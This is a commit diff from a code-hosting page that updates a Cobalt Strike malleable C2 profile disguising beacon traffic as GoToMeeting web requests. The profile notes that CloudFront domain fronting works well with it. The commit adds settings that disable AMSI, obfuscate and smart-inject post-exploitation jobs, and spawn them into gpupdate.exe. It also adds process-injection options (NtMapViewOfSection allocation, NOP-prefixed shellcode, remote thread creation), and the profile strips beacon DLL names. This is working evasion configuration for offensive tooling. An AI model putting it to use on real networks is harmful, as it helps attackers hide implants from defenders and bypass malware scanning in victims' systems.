updated to work with 3.14.
xx0hcd
GitHub
parent
293374fe70
commit
f1c591306d
|
|
@ -1,5 +1,5 @@
|
|||
#gotomeeting profile
|
||||
#works good using Cloudfront with domain fronting, especially since Cloudfront doesn't verify the CNAME you enter...
|
||||
#updated for 3.14
|
||||
#this traffic mimics site traffic, NOT the actual ADP protocol used when the app loads and the meeting starts.
|
||||
#xx0hcd
|
||||
|
||||
|
|
@ -16,7 +16,6 @@ set sample_name "gotomeeting.profile";
|
|||
# set password "your_store_pass";
|
||||
#}
|
||||
|
||||
#ordering server response headers, from 3.13.
|
||||
http-config {
|
||||
set headers "Server, Content-Type, Brightspot-Id, Cache-Control, X-Content-Type-Options, X-Powered-By, Vary, Connection";
|
||||
header "Content-Type" "text/html;charset=UTF-8";
|
||||
|
|
@ -27,6 +26,8 @@ http-config {
|
|||
header "X-Content-Type-Options" "nosniff";
|
||||
header "X-Powered-By" "Brightspot";
|
||||
header "Vary" "Accept-Encoding";
|
||||
set trust_x_forwarded_for "false";
|
||||
|
||||
}
|
||||
|
||||
http-get {
|
||||
|
|
@ -152,7 +153,6 @@ http-stager {
|
|||
set uri_x64 "/Meeting/32251816/";
|
||||
|
||||
client {
|
||||
#set Host header to whatever, probably using stageless anyway right?
|
||||
# header "Host" "whatever.gotomeeting.com";
|
||||
header "Accept" "*/*";
|
||||
header "Accept-Language" "en-US";
|
||||
|
|
@ -169,12 +169,19 @@ http-stager {
|
|||
###Malleable PE Options###
|
||||
#always test spawnto and module stomp before using. My examples tested on Windows 10 Pro.
|
||||
|
||||
post-ex {
|
||||
|
||||
set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe";
|
||||
set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe";
|
||||
|
||||
#attempt to disable amsi for execute-assembly, powerpick, and psinject from 3.13
|
||||
set obfuscate "true";
|
||||
|
||||
set smartinject "true";
|
||||
|
||||
set amsi_disable "true";
|
||||
|
||||
}
|
||||
|
||||
#used peclone on wwanmm.dll.
|
||||
#don't use 'set image_size_xx' if using 'set module_xx'
|
||||
stage {
|
||||
|
|
@ -209,3 +216,28 @@ stage {
|
|||
strrep "beacon.x64.dll" "";
|
||||
}
|
||||
}
|
||||
process-inject {
|
||||
|
||||
set allocator "NtMapViewOfSection";
|
||||
|
||||
set min_alloc "16700";
|
||||
|
||||
set userwx "false";
|
||||
|
||||
set startrwx "true";
|
||||
|
||||
transform-x86 {
|
||||
prepend "\x90\x90\x90";
|
||||
}
|
||||
transform-x64 {
|
||||
prepend "\x90\x90\x90";
|
||||
}
|
||||
|
||||
execute {
|
||||
CreateThread "ntdll!RtlUserThreadStart";
|
||||
CreateThread;
|
||||
NtQueueApcThread;
|
||||
CreateRemoteThread;
|
||||
RtlCreateUserThread;
|
||||
}
|
||||
}
|
||||
|
|
|
|||
Loading…
Reference in New Issue